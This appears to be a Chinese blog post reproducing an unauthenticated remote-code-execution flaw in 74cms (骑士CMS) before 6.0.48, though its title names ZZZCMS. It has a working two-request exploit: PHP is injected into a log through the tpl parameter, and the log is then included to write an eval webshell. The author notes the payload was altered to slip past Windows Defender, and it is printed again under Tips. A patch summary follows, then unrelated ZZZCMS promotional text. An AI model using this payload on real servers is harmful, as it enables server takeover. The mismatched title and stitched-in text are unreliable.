(环境搭建+复现)ZZZCMS模版注入+文件包含getshell

0x00 简介

骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。

0x01 漏洞概述

骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。

0x02 影响版本

骑士 CMS < 6.0.48

0x03 环境搭建

1、下载最新版74cms。

https://www.74cms.com/download/index.html

2、使用phpstudy进行搭建。

进入upload目录即可进入安装程序。

0x04 漏洞利用

1、首先通过日志写入Payload。这么写payload因为测试环境我的Defender报毒了,就简单变形一下即可绕过。

POST /74cms_Home_Setup_v6.0.20/upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1

variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php \$a=\$_POST['x'];\$b='a';eval(\$\$b);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

2、包含日志。默认日志位置为data/Runtime/Logs/Home/Y_M_D.log

POST /74cms_Home_Setup_v6.0.20/upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1

variable=1&tpl=data/Runtime/Logs/Home/20_12_16.log

3、此时根目录下就会生成shell.php文件。

4、连接即可。

0x05 修复方式

http://www.74cms.com/news/show-2497.html

从官方公布的信息来看,官方修复了两个地方:

1、/Application/Common/Controller/BaseController.class.php

左图修复前,右图为修复后。

$view->parseTemplate对$tpl参数进行处理,并对处理结果$tpl_file进行is_file判断。后续主要判断传入的是否为文件。

2、/ThinkPHP/Library/Think/View.class.php

左图修复前,右图为修复后。

主要更改的是,新版本日志不再包含模板名称。也就无法写入payload。

0x06 Tips:

payload:

variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php \$a=\$_POST['x'];\$b='a';eval(\$\$b);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

将PHP代码写入文件时,$符号需要使用反斜杠进行转义,否则会被识别为变量从而报错。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
zzzcms采用asp+access Utf-8进行开发,软件绿色且可直接使用,直接上传到空间内即可使用。 zzzcms就是要打造一款简单、易用、舒服的建站系统,zzzcms的管理系统处处为了让站长更节省时间,减少站长和管理员工作,在交互上尽量减少操作步骤,降低确认,返回,知道了等按钮的出现,并支持按键exc,ctrl+enter返回和提交功能。 集成好了自动关键词,自动描述,自动拼音,留言模块,会员模块,产品相册模块,百度地图模块,qq客服模块,自动静态,翻页样式,批量传图,批量加栏目等等,后续还会增加更多方便、实用的模块。 功能模块: 1.支持电脑端+手机端,支持无缝切换。 2.支持站内模糊搜索。 3.支持会员系统,找回密码,会员头像等。 4.支持内容会员权限功能。 5.集成两套qq客服,支持多个qq,多个电话,多个联系人。 6.支持全站自动静态,支持伪静态+静态缓存。 7.支持数据库备份、恢复功能。 8.支持session、cookie模式切换,香港空间不怕狂掉线了。 9.支持批量上传图片,自定义参数,自动关键词,描述,tag标签等。 10.支持上传文件管理,支持冗余检测。 11.支持模板切换、管理,在线模板。 12.支持插件热插拔,在线插件。 13.支持留言、管理员回复。 14.支持aspjpeg水印,支持png透明水印。 15.支持jmail邮件提醒,支持配置设定。 16.支持验证码开关。 17.支持批量添加栏目,支持无线级栏目。 18.支持栏目模型管理。 19.支持栏目模型自定义参数管理。 20.支持幻灯管理,幻灯数量和分组不限。 21.支持友情链接管理。 22.支持广告管理。 23.支持Tag标签。 24.支持自定义内容。 25.支持首页翻页。 26.支持百度地图标注,自动生成。 27.支持网站logo,手机logo,微信图片的上传。 插件功能: 1.会员投稿功能插件。 2.内链关键词功能插件。 3.筛选功能插件。 4.顶踩、赞一个、推荐功能插件。 5.全功能自定义表单插件。 6.评论插件

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值